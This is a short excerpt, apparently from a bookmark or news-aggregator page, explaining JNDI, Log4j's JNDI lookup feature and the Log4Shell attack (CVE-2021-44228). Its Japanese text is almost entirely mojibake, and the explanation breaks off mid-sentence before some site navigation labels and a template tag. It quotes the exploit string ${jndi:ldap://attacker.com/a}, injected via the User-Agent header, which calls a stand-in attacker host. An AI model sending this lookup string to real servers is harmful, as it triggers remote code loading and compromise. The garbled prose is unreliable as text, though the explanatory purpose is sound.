JNDI ã¨ã¯Java Naming and Directory Interface ã¨ãããJava ã¢ããªã±ã¼ã·ã§ã³ã DNS ã LDAP çã®ãµã¼ãã¹ãå©ç¨ããããã®æ±ç¨çãªã¤ã³ã¿ãã§ã¼ã¹ (ã©ã¤ãã©ãª) ã§ãã Log4j 㨠JNDI lookupApache Software Foundation ãéçºãããJava ãã¼ã¹ã®ãã®ã³ã°ã«é¢ããã©ã¤ãã©ãªã§ããJNDI lookup ã¨ããæ©è½ããããæ¸ãè¾¼ãã ãã°ã®ä¸é¨ãèªåã§å¤æ°åãã¾ããä»åã¯ãã®æ©è½ãæªç¨ããã¦ãã¾ãã CVE-2021-44228 ã®æ»æã·ã¼ã±ã³ã¹ã®ä¾ æ»æè ã¯èå¼±æ§ãããªã¬ã¼ããããã« http ãããã® User-Agent ã« ${jndi:ldap://attacker.com/a} ã¨ããæååãåãè¾¼ã¿ãhttp ãªã¯ã¨ã¹ããéä¿¡ãã¾ããèå¼±æ§ã®ãããµã¼ãã® Java App ã¯ãã®éä¿¡ã
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}